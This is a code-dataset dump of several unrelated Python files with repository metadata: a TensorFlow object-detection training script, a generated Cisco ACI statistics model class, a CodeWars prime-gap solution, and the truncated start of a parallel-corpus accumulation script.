cdb5305e2659c879558f942f3a20592135fbf94c | 27833d78d12746f94af6210a72a7068a7f91e8a4 | /chapter05/s_chapter02/train.py | 30229bb1bd6ac75d11dab98301f35f2b219ab739 | [] | no_license | WuMenghao/DeepLearningDemo | 441b0aedcb07b26ab94c34c0ee026e782514c481 | 3689c50dabfe41e6fd6b1560522704664d0f2e92 | refs/heads/master | 2023-04-05T17:44:37.954880 | 2020-01-06T05:46:07 | 2020-01-06T05:46:07 | 218,517,640 | 0 | 0 | null | 2023-03-24T21:54:28 | 2019-10-30T12:01:13 | Python | UTF-8 | Python | false | false | 7,285 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training executable for detection models.
This executable is used to train DetectionModels. There are two ways of
configuring the training job:
1) A single pipeline_pb2.TrainEvalPipelineConfig configuration file
can be specified by --pipeline_config_path.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--pipeline_config_path=pipeline_config.pbtxt
2) Three configuration files can be provided: a model_pb2.DetectionModel
configuration file to define what type of DetectionModel is being trained, an
input_reader_pb2.InputReader file to specify what training data will be used and
a train_pb2.TrainConfig file to configure training parameters.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--model_config_path=model_config.pbtxt \
--train_config_path=train_config.pbtxt \
--input_config_path=train_input_config.pbtxt
"""
import functools
import json
import os
import tensorflow as tf
from google.protobuf import text_format
import trainer
from object_detection.builders import input_reader_builder
from object_detection.builders import model_builder
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
# Logging setup and command-line flag definitions (tf.app.flags).
tf.logging.set_verbosity(tf.logging.INFO)
flags = tf.app.flags
flags.DEFINE_string('master', '', 'BNS name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('num_clones', 1, 'Number of clones to deploy per worker.')
flags.DEFINE_boolean('clone_on_cpu', False,
                     'Force clones to be deployed on CPU. Note that even if '
                     'set to False (allowing ops to run on gpu), some ops may '
                     'still be run on the CPU if they have no GPU kernel.')
flags.DEFINE_integer('worker_replicas', 1, 'Number of worker+trainer '
                     'replicas.')
flags.DEFINE_integer('ps_tasks', 0,
                     'Number of parameter server tasks. If None, does not use '
                     'a parameter server.')
flags.DEFINE_string('train_dir', '',
                    'Directory to save the checkpoints and training summaries.')
# Either a single pipeline config, or the three separate configs below.
flags.DEFINE_string('pipeline_config_path', '',
                    'Path to a pipeline_pb2.TrainEvalPipelineConfig config '
                    'file. If provided, other configs are ignored')
flags.DEFINE_string('train_config_path', '',
                    'Path to a train_pb2.TrainConfig config file.')
flags.DEFINE_string('input_config_path', '',
                    'Path to an input_reader_pb2.InputReader config file.')
flags.DEFINE_string('model_config_path', '',
                    'Path to a model_pb2.DetectionModel config file.')
FLAGS = flags.FLAGS
def get_configs_from_pipeline_file():
  """Reads training configuration from a single pipeline config file.

  Parses the file named by --pipeline_config_path as a text-format
  pipeline_pb2.TrainEvalPipelineConfig.

  Returns:
    model_config: model_pb2.DetectionModel
    train_config: train_pb2.TrainConfig
    input_config: input_reader_pb2.InputReader
  """
  config = pipeline_pb2.TrainEvalPipelineConfig()
  with tf.gfile.GFile(FLAGS.pipeline_config_path, 'r') as config_file:
    text_format.Merge(config_file.read(), config)
  return (config.model,
          config.train_config,
          config.train_input_reader)
def get_configs_from_multiple_files():
  """Reads training configuration from three separate config files.

  Loads, in this order, the train config (--train_config_path), the model
  config (--model_config_path) and the input reader config
  (--input_config_path), each as a text-format protobuf.

  Returns:
    model_config: model_pb2.DetectionModel
    train_config: train_pb2.TrainConfig
    input_config: input_reader_pb2.InputReader
  """
  def _merge_from_file(path, message):
    # Read a text-format proto file and merge it into the given message.
    with tf.gfile.GFile(path, 'r') as config_file:
      text_format.Merge(config_file.read(), message)
    return message

  train_config = _merge_from_file(FLAGS.train_config_path,
                                  train_pb2.TrainConfig())
  model_config = _merge_from_file(FLAGS.model_config_path,
                                  model_pb2.DetectionModel())
  input_config = _merge_from_file(FLAGS.input_config_path,
                                  input_reader_pb2.InputReader())
  return model_config, train_config, input_config
def main(_):
  """Builds the configs from flags, then starts (possibly distributed) training."""
  assert FLAGS.train_dir, '`train_dir` is missing.'
  if FLAGS.pipeline_config_path:
    model_config, train_config, input_config = get_configs_from_pipeline_file()
  else:
    model_config, train_config, input_config = get_configs_from_multiple_files()
  model_fn = functools.partial(
      model_builder.build,
      model_config=model_config,
      is_training=True)
  create_input_dict_fn = functools.partial(
      input_reader_builder.build, input_config)
  # TF_CONFIG (set by the cluster manager) describes the cluster and this
  # task's role; without it, fall back to single-process "master" defaults.
  env = json.loads(os.environ.get('TF_CONFIG', '{}'))
  cluster_data = env.get('cluster', None)
  cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
  task_data = env.get('task', None) or {'type': 'master', 'index': 0}
  task_info = type('TaskSpec', (object,), task_data)
  # Parameters for a single worker.
  ps_tasks = 0
  worker_replicas = 1
  worker_job_name = 'lonely_worker'
  task = 0
  is_chief = True
  master = ''
  if cluster_data and 'worker' in cluster_data:
    # Number of total worker replicas include "worker"s and the "master".
    worker_replicas = len(cluster_data['worker']) + 1
  if cluster_data and 'ps' in cluster_data:
    ps_tasks = len(cluster_data['ps'])
  if worker_replicas > 1 and ps_tasks < 1:
    raise ValueError('At least 1 ps task is needed for distributed training.')
  if worker_replicas >= 1 and ps_tasks > 0:
    # Set up distributed training.
    server = tf.train.Server(tf.train.ClusterSpec(cluster), protocol='grpc',
                             job_name=task_info.type,
                             task_index=task_info.index)
    # Parameter servers only serve variables; join() blocks forever.
    if task_info.type == 'ps':
      server.join()
      return
    worker_job_name = '%s/task:%d' % (task_info.type, task_info.index)
    task = task_info.index
    is_chief = (task_info.type == 'master')
    master = server.target
  trainer.train(create_input_dict_fn, model_fn, train_config, master, task,
                FLAGS.num_clones, worker_replicas, FLAGS.clone_on_cpu, ps_tasks,
                worker_job_name, is_chief, FLAGS.train_dir)
if __name__ == '__main__':
  tf.app.run()
| [
"tm_wmh@foxmail.com"
] | tm_wmh@foxmail.com |
e6cb1c6ae8c2f5f50118d4848598853900007fbf | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqptcapacity/l3remoteusageper1year.py | 9f5ceefbfc23a4350dd913a6766bce7204c280e9 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 19,817 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class L3RemoteUsagePer1year(Mo):
    """
    Current statistics (1-year granularity) for the percentage of Layer3
    remote (v4/v6) entry usage. Auto-generated model class -- per the file
    header, do not hand-edit the generated statements below.
    """
    meta = StatsClassMeta("cobra.model.eqptcapacity.L3RemoteUsagePer1year", "Layer3 remote entries usage percentage")
    # Counter metadata: map each gauge to its implicit stat property names.
    counter = CounterMeta("normalizedRemotev6", CounterCategory.GAUGE, "percentage", "Remote v6 L3 entries usage percentage")
    counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "normalizedRemotev6Last"
    counter._propRefs[PropCategory.IMPLICIT_MIN] = "normalizedRemotev6Min"
    counter._propRefs[PropCategory.IMPLICIT_MAX] = "normalizedRemotev6Max"
    counter._propRefs[PropCategory.IMPLICIT_AVG] = "normalizedRemotev6Avg"
    counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "normalizedRemotev6Spct"
    counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "normalizedRemotev6Ttl"
    counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "normalizedRemotev6Thr"
    counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "normalizedRemotev6TrBase"
    counter._propRefs[PropCategory.IMPLICIT_TREND] = "normalizedRemotev6Tr"
    meta._counters.append(counter)
    counter = CounterMeta("normalizedRemotev4", CounterCategory.GAUGE, "percentage", "Remote v4 L3 entries usage percentage")
    counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "normalizedRemotev4Last"
    counter._propRefs[PropCategory.IMPLICIT_MIN] = "normalizedRemotev4Min"
    counter._propRefs[PropCategory.IMPLICIT_MAX] = "normalizedRemotev4Max"
    counter._propRefs[PropCategory.IMPLICIT_AVG] = "normalizedRemotev4Avg"
    counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "normalizedRemotev4Spct"
    counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "normalizedRemotev4Ttl"
    counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "normalizedRemotev4Thr"
    counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "normalizedRemotev4TrBase"
    counter._propRefs[PropCategory.IMPLICIT_TREND] = "normalizedRemotev4Tr"
    meta._counters.append(counter)
    # Class identity, naming and access metadata.
    meta.moClassName = "eqptcapacityL3RemoteUsagePer1year"
    meta.rnFormat = "CDeqptcapacityL3RemoteUsagePer1year"
    meta.category = MoCategory.STATS_CURRENT
    meta.label = "current Layer3 remote entries usage percentage stats in 1 year"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x1
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = True
    meta.parentClasses.add("cobra.model.eqptcapacity.Entity")
    meta.superClasses.add("cobra.model.eqptcapacity.L3RemoteUsagePer")
    meta.superClasses.add("cobra.model.stats.Curr")
    meta.superClasses.add("cobra.model.stats.Item")
    meta.rnPrefixes = [
        ('CDeqptcapacityL3RemoteUsagePer1year', False),
        ]
    # Property definitions (generated): bookkeeping props, then the implicit
    # stat fields for each counter, then the standard MO props (rn, status...).
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)
    prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
    prop.label = "Number of Collections During this Interval"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("cnt", prop)
    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)
    prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
    prop.label = "Collection Length"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("lastCollOffset", prop)
    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)
    prop = PropMeta("str", "normalizedRemotev4Avg", "normalizedRemotev4Avg", 36635, PropCategory.IMPLICIT_AVG)
    prop.label = "Remote v4 L3 entries usage percentage average value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Avg", prop)
    prop = PropMeta("str", "normalizedRemotev4Last", "normalizedRemotev4Last", 36632, PropCategory.IMPLICIT_LASTREADING)
    prop.label = "Remote v4 L3 entries usage percentage current value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Last", prop)
    prop = PropMeta("str", "normalizedRemotev4Max", "normalizedRemotev4Max", 36634, PropCategory.IMPLICIT_MAX)
    prop.label = "Remote v4 L3 entries usage percentage maximum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Max", prop)
    prop = PropMeta("str", "normalizedRemotev4Min", "normalizedRemotev4Min", 36633, PropCategory.IMPLICIT_MIN)
    prop.label = "Remote v4 L3 entries usage percentage minimum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Min", prop)
    prop = PropMeta("str", "normalizedRemotev4Spct", "normalizedRemotev4Spct", 36636, PropCategory.IMPLICIT_SUSPECT)
    prop.label = "Remote v4 L3 entries usage percentage suspect count"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Spct", prop)
    # Thresholded-flags property: each constant is a bit in a flag bitmask.
    prop = PropMeta("str", "normalizedRemotev4Thr", "normalizedRemotev4Thr", 36638, PropCategory.IMPLICIT_THRESHOLDED)
    prop.label = "Remote v4 L3 entries usage percentage thresholded flags"
    prop.isOper = True
    prop.isStats = True
    prop.defaultValue = 0
    prop.defaultValueStr = "unspecified"
    prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
    prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
    prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
    prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
    prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
    prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
    prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
    prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
    prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
    prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
    prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
    prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
    prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
    prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
    prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
    prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
    prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
    prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
    prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
    prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
    prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
    prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
    prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
    prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
    prop._addConstant("maxMajor", "max-severity-major", 8589934592)
    prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
    prop._addConstant("maxRecovering", "max-recovering", 268435456)
    prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
    prop._addConstant("minCrit", "min-severity-critical", 134217728)
    prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
    prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
    prop._addConstant("minMajor", "min-severity-major", 67108864)
    prop._addConstant("minMinor", "min-severity-minor", 33554432)
    prop._addConstant("minRecovering", "min-recovering", 2097152)
    prop._addConstant("minWarn", "min-severity-warning", 16777216)
    prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
    prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
    prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
    prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
    prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
    prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
    prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
    prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
    prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
    prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
    prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
    prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
    prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
    prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
    prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
    prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
    prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
    prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
    prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
    prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
    prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
    prop._addConstant("unspecified", None, 0)
    meta.props.add("normalizedRemotev4Thr", prop)
    prop = PropMeta("str", "normalizedRemotev4Tr", "normalizedRemotev4Tr", 36640, PropCategory.IMPLICIT_TREND)
    prop.label = "Remote v4 L3 entries usage percentage trend"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Tr", prop)
    prop = PropMeta("str", "normalizedRemotev4TrBase", "normalizedRemotev4TrBase", 36639, PropCategory.IMPLICIT_TREND_BASE)
    prop.label = "Remote v4 L3 entries usage percentage trend baseline"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4TrBase", prop)
    prop = PropMeta("str", "normalizedRemotev4Ttl", "normalizedRemotev4Ttl", 36637, PropCategory.IMPLICIT_TOTAL)
    prop.label = "Remote v4 L3 entries usage percentage total sum"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev4Ttl", prop)
    prop = PropMeta("str", "normalizedRemotev6Avg", "normalizedRemotev6Avg", 36650, PropCategory.IMPLICIT_AVG)
    prop.label = "Remote v6 L3 entries usage percentage average value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Avg", prop)
    prop = PropMeta("str", "normalizedRemotev6Last", "normalizedRemotev6Last", 36647, PropCategory.IMPLICIT_LASTREADING)
    prop.label = "Remote v6 L3 entries usage percentage current value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Last", prop)
    prop = PropMeta("str", "normalizedRemotev6Max", "normalizedRemotev6Max", 36649, PropCategory.IMPLICIT_MAX)
    prop.label = "Remote v6 L3 entries usage percentage maximum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Max", prop)
    prop = PropMeta("str", "normalizedRemotev6Min", "normalizedRemotev6Min", 36648, PropCategory.IMPLICIT_MIN)
    prop.label = "Remote v6 L3 entries usage percentage minimum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Min", prop)
    prop = PropMeta("str", "normalizedRemotev6Spct", "normalizedRemotev6Spct", 36651, PropCategory.IMPLICIT_SUSPECT)
    prop.label = "Remote v6 L3 entries usage percentage suspect count"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Spct", prop)
    # Same flag bitmask layout as the v4 thresholded property above.
    prop = PropMeta("str", "normalizedRemotev6Thr", "normalizedRemotev6Thr", 36653, PropCategory.IMPLICIT_THRESHOLDED)
    prop.label = "Remote v6 L3 entries usage percentage thresholded flags"
    prop.isOper = True
    prop.isStats = True
    prop.defaultValue = 0
    prop.defaultValueStr = "unspecified"
    prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
    prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
    prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
    prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
    prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
    prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
    prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
    prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
    prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
    prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
    prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
    prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
    prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
    prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
    prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
    prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
    prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
    prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
    prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
    prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
    prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
    prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
    prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
    prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
    prop._addConstant("maxMajor", "max-severity-major", 8589934592)
    prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
    prop._addConstant("maxRecovering", "max-recovering", 268435456)
    prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
    prop._addConstant("minCrit", "min-severity-critical", 134217728)
    prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
    prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
    prop._addConstant("minMajor", "min-severity-major", 67108864)
    prop._addConstant("minMinor", "min-severity-minor", 33554432)
    prop._addConstant("minRecovering", "min-recovering", 2097152)
    prop._addConstant("minWarn", "min-severity-warning", 16777216)
    prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
    prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
    prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
    prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
    prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
    prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
    prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
    prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
    prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
    prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
    prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
    prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
    prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
    prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
    prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
    prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
    prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
    prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
    prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
    prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
    prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
    prop._addConstant("unspecified", None, 0)
    meta.props.add("normalizedRemotev6Thr", prop)
    prop = PropMeta("str", "normalizedRemotev6Tr", "normalizedRemotev6Tr", 36655, PropCategory.IMPLICIT_TREND)
    prop.label = "Remote v6 L3 entries usage percentage trend"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Tr", prop)
    prop = PropMeta("str", "normalizedRemotev6TrBase", "normalizedRemotev6TrBase", 36654, PropCategory.IMPLICIT_TREND_BASE)
    prop.label = "Remote v6 L3 entries usage percentage trend baseline"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6TrBase", prop)
    prop = PropMeta("str", "normalizedRemotev6Ttl", "normalizedRemotev6Ttl", 36652, PropCategory.IMPLICIT_TOTAL)
    prop.label = "Remote v6 L3 entries usage percentage total sum"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("normalizedRemotev6Ttl", prop)
    prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
    prop.label = "Reporting End Time"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("repIntvEnd", prop)
    prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
    prop.label = "Reporting Start Time"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("repIntvStart", prop)
    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)
    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)
    def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
        """Create the MO under *parentMoOrDn*; this class has no naming properties."""
        namingVals = []
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
6ad851cbcd18f3f09636edf8d5926440492921f1 | 56b5bce8ad3d778ab5a6665f49fe920b14c6ba76 | /Python/prime_gap.py | 21fb8a52808a5e371839bfa1be251c3abec13f8f | [] | no_license | oversj96/CodeWarsProjects | aeef268f1eb88856b2f3479fe1f0925b76251569 | f3bd33484c65131b158c931db3deced72901ba6a | refs/heads/master | 2020-07-19T05:44:29.043957 | 2019-09-13T16:12:14 | 2019-09-13T16:12:14 | 206,385,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | def gap(g, m, n):
if(m % 2 == 0):
m += 1
for i in range(m, n+1, 2):
for x in range(2, i+1):
if(i % x == 0 and i is not x):
break
elif(i == x):
for j in range(i, i+g+1):
for y in range(2, j+1):
if(j % y == 0 and j is not y):
break
elif(j == i+g):
return [i, j]
return None
print (gap(4,100,110)) | [
"45669103+oversj96@users.noreply.github.com"
] | 45669103+oversj96@users.noreply.github.com |
b7615ccb5fb53b5adb5e8d5f5076d4dcafddc37d | 53d1bdf15ac38f23785dc2d12438300a3c4420ef | /tools/accumulate.py | d0a5579de0f8e672b28ffa6d78d9dc57af54bdcf | [] | no_license | sbmaruf/Parallel-data-ted | c69273814b3584544207b681445aba3e1dc2e629 | 4f19ec96042d0b0831a7134bd2385cd7276a2536 | refs/heads/master | 2021-04-09T11:23:54.630315 | 2018-07-05T08:36:48 | 2018-07-05T08:36:48 | 124,411,201 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,579 | py | import os
import argparse
import time
import sys
from collections import OrderedDict
import re
import unicodedata
parser = argparse.ArgumentParser(
description="Accumulate different source of data",
prog=((sys.argv[2] + '.py') if os.path.basename(sys.argv[0]) == 'pydoc' else sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("--src_lang",
type=str,
default="en",
help="short identifier of the source language. ex: en")
parser.add_argument("--tgt_lang",
type=str,
default="ms",
help="short identifier of the target language. ex: ms")
parser.add_argument("--dir",
type=str,
default="./en-ms/",
help="folder address where the data files exists. data file pattern:"
" file_name.lang1-lang2.selected_lang. ex: amara.en-ms.en")
parser.add_argument("--out_dir",
type=str,
default="./nmt_io/",
help="folder address where the data files will be saved.")
parser.add_argument("--parallel_file",
type=int,
default=1,
help="if the parallel lines will be saved in same file or not."
"condition for parallel_file == 0 is not implemented in the script")
parser.add_argument("--debug",
type=int,
default=1,
help="if the parallel lines will be saved in same file or not.")
parser.add_argument("--restrict",
type=str,
default="",
help="if the parallel lines will be saved in same file or not.")
parser.add_argument("--verbose",
type=int,
default=2,
help="printing additional information."
"verbose = 2 : show the details step of folder creation."
"verbose = 1 : Additional information printing.")
def retrieve_file_dict(_all_files, src_lang, tgt_lang):
"""
retrieve the filename form a nmt based naming files.
example:
input : gnome.en-ms.en
output : gnome
:param _all_files: the nmt bas named file in a list.
:param src_lang: the src_language short form.
:param tgt_lang: the tgt_language short form.
:return: a dictionary(OrderedDict) of file names, and the output_file_name in string
"""
search_str = '.' + src_lang + '-' + tgt_lang
src_search_str = search_str + '.' + src_lang
tgt_search_str = search_str + '.' + tgt_lang
_file_dict = OrderedDict()
for files in _all_files:
if src_search_str in files:
file_name = files.split(sep=src_search_str)
_file_dict[file_name[0]] = 1
if tgt_search_str in files:
file_name = files.split(sep=tgt_search_str)
_file_dict[file_name[0]] = 1
output_file_name = ''
flag = 0
for name in _file_dict:
output_file_name = output_file_name + ("_" if flag > 0 else "") + name
flag = 1
return _file_dict, output_file_name
def assert_check_before(_src_file_address,
_tgt_file_address):
_num_lines_src = sum(1 for _ in open(_src_file_address))
_num_lines_tgt = sum(1 for _ in open(_tgt_file_address))
line_no = 0
